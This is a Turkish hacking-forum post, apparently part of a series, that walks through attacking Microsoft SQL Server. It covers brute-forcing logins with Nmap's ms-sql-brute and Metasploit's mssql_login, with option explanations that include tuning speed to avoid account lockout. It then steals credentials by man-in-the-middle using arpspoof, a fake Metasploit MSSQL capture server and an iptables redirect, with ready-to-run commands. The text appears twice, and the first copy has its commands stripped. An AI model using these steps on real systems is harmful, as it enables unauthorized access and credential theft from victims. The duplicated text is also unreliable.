Arkadaşlar kısa bir aradan sonra yazımıza devam ediyoruz.Serimizin ilk yazısınagitmek istiyorsanız => http://www.turkhackteam.org/web-ser...e-guvenlik-testi-calismalari.html#post6964343
4.Sızma Çalışmaları :
Bu aşamamızda Brute Force ve Man in the middle saldırılarıyla sızma işlemimizi gerçekleştireceğiz.Bu iki yöntemi de ayrı başlıklar altında inceleyelim.
4.1.Brute Force ile Hesap Ele Geçirme : Microsoft SQL Server'a birçok araç ile brute force saldırısı gerçekleştirebiliriz.Biz Nmap'in ms-sql-brute modülü ve ****sploit'in mssql_login modülüyle bu işlemi gerçekleştireceğiz.
4.1.1.Nmap ile Brute Force Saldırısı: Bahsettiğimiz gibi Microsoft SQL Server'a Nmap'in "ms-sql-brute" modülüyle brute force saldırısı gerçekleştirebiliriz.Bu saldırıda kullanmak için kullanıcı adı ve şifreleri içeren kelime listelerine sahip olmamız gerekir.
Şimdi Nmap ile brute force için
komutunu kullanacağız ve nmap kullanıcı adı-şifreyi bulduğunda resimdeki gibi bir çıktı verecektir.
Yani bu saldırımızda kullanıcı adını "sa" şifreyi "BGA-123" olarak bulduk.
4.1.2.****sploit ile Brute Force Saldırısı :
Nmap ile yaptıgımızın aynısını ****sploit'in "mssql_login" modülüyle de yapabiliriz.
Ancak bu saldırıyı ****sploit ile yapmamız daha ajantajlı olacaktır.Çünkü ****sploit'te daha fazla ayar çekebiliriz."show options" komutuyla modülümüzün istediği ayarlar yansıtılır.Biz
"RHOSTS, RPORT, USERNAME, PASS_FILE" değerleri üzerinde değişiklik yaparak saldırımızı gerçekleştireceğiz.Şimdi modülün ayarlarını açıklayalım :
Gerekli ayarlar yapıldıktan sonra modül çalıştırılır ve başarılı olunduğunda resimdeki gibi sonuç alınır.
4.2.Mitm ile Hesap Ele Geçirme :
Mitm ile ağ içerisinde bulunan Microsoft SQL Servera ait giriş bilgilerini elde edebiliriz.Bu saldırı için ****sploit'i kullanacağız.Ancak saldırıya başlamadan önce işletim sisteminde Ip Forwarding(Ip Yönlendirme) aktif edilmelidir.Bunu
komutuyla kolaylıkla yapabiliriz.
Ip Forwarding'i aktif hale getirdikten sonra arpspoof aracıyla hedef ile sunucu arasına girilir.
Bunun için
komutları kullanılabilir.Bu komutları çalıştırdıktan sonra ****sploit'teki ilgili modülün ayarları yapılır ve çalıştırılır.Bunun için önce
komutuyla modül aktif hale getirilir.
ve SRVPORT ayarına port numarası
komutuyla girilir.Ve modül çalıştıılır.
Bu işlemlerden sonra iptables ile NAT kuralı girilir.Girilen kural 1433 numaralı port üzerinde çalışan gerçek Microsoft SQL Server hizmetine ulaşmak isteyen trafiği saldırgan bilgisayarda çalışan sahte Microsoft SQL Server hizmetine yönlendirir.Bunu aşağıdaki komutla yaparız.
Kurban hesap bilgilerini girdiğinde girilen hesap bilgilerini ****sploit yansıtacaktır.
Ve kurban doğru kullanıcı adı ve şifreyi girmesine rağmen resimdeki hatayı alacaktır.
EVET ARKADAŞLAR BUGÜNLÜK KONUMUZ BURAYA KADARDI.DEVAMINI EN KISA ZAMANDA YAZACAĞIM.OKUDUGUNUZ İÇİN TEŞEKKÜRLER.
4.Sızma Çalışmaları :
Bu aşamamızda Brute Force ve Man in the middle saldırılarıyla sızma işlemimizi gerçekleştireceğiz.Bu iki yöntemi de ayrı başlıklar altında inceleyelim.
4.1.Brute Force ile Hesap Ele Geçirme : Microsoft SQL Server'a birçok araç ile brute force saldırısı gerçekleştirebiliriz.Biz Nmap'in ms-sql-brute modülü ve ****sploit'in mssql_login modülüyle bu işlemi gerçekleştireceğiz.
4.1.1.Nmap ile Brute Force Saldırısı: Bahsettiğimiz gibi Microsoft SQL Server'a Nmap'in "ms-sql-brute" modülüyle brute force saldırısı gerçekleştirebiliriz.Bu saldırıda kullanmak için kullanıcı adı ve şifreleri içeren kelime listelerine sahip olmamız gerekir.
Şimdi Nmap ile brute force için
Kod:
$ nmap -p <PORT> --script ms-sql-brute --script-args mssql.instance-all,userdb=wordlist.txt,passdb=wordlist.txt <HEDEF IP>Yani bu saldırımızda kullanıcı adını "sa" şifreyi "BGA-123" olarak bulduk.
4.1.2.****sploit ile Brute Force Saldırısı :
Nmap ile yaptıgımızın aynısını ****sploit'in "mssql_login" modülüyle de yapabiliriz.
Ancak bu saldırıyı ****sploit ile yapmamız daha ajantajlı olacaktır.Çünkü ****sploit'te daha fazla ayar çekebiliriz."show options" komutuyla modülümüzün istediği ayarlar yansıtılır.Biz
"RHOSTS, RPORT, USERNAME, PASS_FILE" değerleri üzerinde değişiklik yaparak saldırımızı gerçekleştireceğiz.Şimdi modülün ayarlarını açıklayalım :
Kod:
RHOSTS => Hedef Ip Adresini bu komutla tanımlıyoruz.
RPORT => Microsoft SQL Server'ın çalıştığı portu bu komutla tanımlıyoruz.
USERNAME => Sakdırıda tek bir kullanıcı adı kullanacaksak bu komutla tanımlıyoruz.
PASSWORD => Saldırıda tek bir şifre kullanacaksak bu komutla tanımlıyoruz.
USER_FILE => Kullanıcı adı listesi kullanacaksak bu komutla tanımlıyoruz.
PASS_FILE => Şifre listesi kullanacaksak bu komutla tanımlıyoruz.
BLANK_PASSWORDS => Bu ayarın "false" değerinde olmasına dikkat edin.Zaten ayarın default değeri false'tır.Bu ayarın false değerinde kalması modülün deneceyeceği kullanıcı adları için boş şifre denemesi yapmayacağı anlamına gelir.
BRUTEFORCE_SPEED => Bu ayar 0-5 arasında değer alır ve yapılacak brute force saldırısı hızını belirtir.Düşük hızda yapılan saldırılar daha iyi sonuç verecektir.Çünkü yüksek hızda yapılan saldırılarda hesap hesap kilitleme politikasına takılma ihtimali vardır.
STOP_ON_SUCCESS => Bu ayar denemelerden biri başarılı oldugunda sıradakinin yapılıp yapılmayacağını belirtir."True" olarak belirtmede yarar vardır.Gerekli ayarlar yapıldıktan sonra modül çalıştırılır ve başarılı olunduğunda resimdeki gibi sonuç alınır.
4.2.Mitm ile Hesap Ele Geçirme :
Mitm ile ağ içerisinde bulunan Microsoft SQL Servera ait giriş bilgilerini elde edebiliriz.Bu saldırı için ****sploit'i kullanacağız.Ancak saldırıya başlamadan önce işletim sisteminde Ip Forwarding(Ip Yönlendirme) aktif edilmelidir.Bunu
Kod:
$ echo 1 > /proc/sys/net/ipv4/ip_forwardIp Forwarding'i aktif hale getirdikten sonra arpspoof aracıyla hedef ile sunucu arasına girilir.
Bunun için
Kod:
$ arpspoof -i eth0 -t <SQL SERVER IP> <KURBAN IP>
Kod:
$ arpspoof -i eth0 -t <KURBAN IP> <SQL SERVER IP>
Kod:
$ use auxiliary/server/capture/mssqlve SRVPORT ayarına port numarası
Kod:
$ set SRVPORT 1433Bu işlemlerden sonra iptables ile NAT kuralı girilir.Girilen kural 1433 numaralı port üzerinde çalışan gerçek Microsoft SQL Server hizmetine ulaşmak isteyen trafiği saldırgan bilgisayarda çalışan sahte Microsoft SQL Server hizmetine yönlendirir.Bunu aşağıdaki komutla yaparız.
Kod:
$ iptables -t nat -A PREROUTING -p tcp -d 192.168.48.130 --dport 1433 -j REDIRECT --to-ports 1433Ve kurban doğru kullanıcı adı ve şifreyi girmesine rağmen resimdeki hatayı alacaktır.
EVET ARKADAŞLAR BUGÜNLÜK KONUMUZ BURAYA KADARDI.DEVAMINI EN KISA ZAMANDA YAZACAĞIM.OKUDUGUNUZ İÇİN TEŞEKKÜRLER.
uah
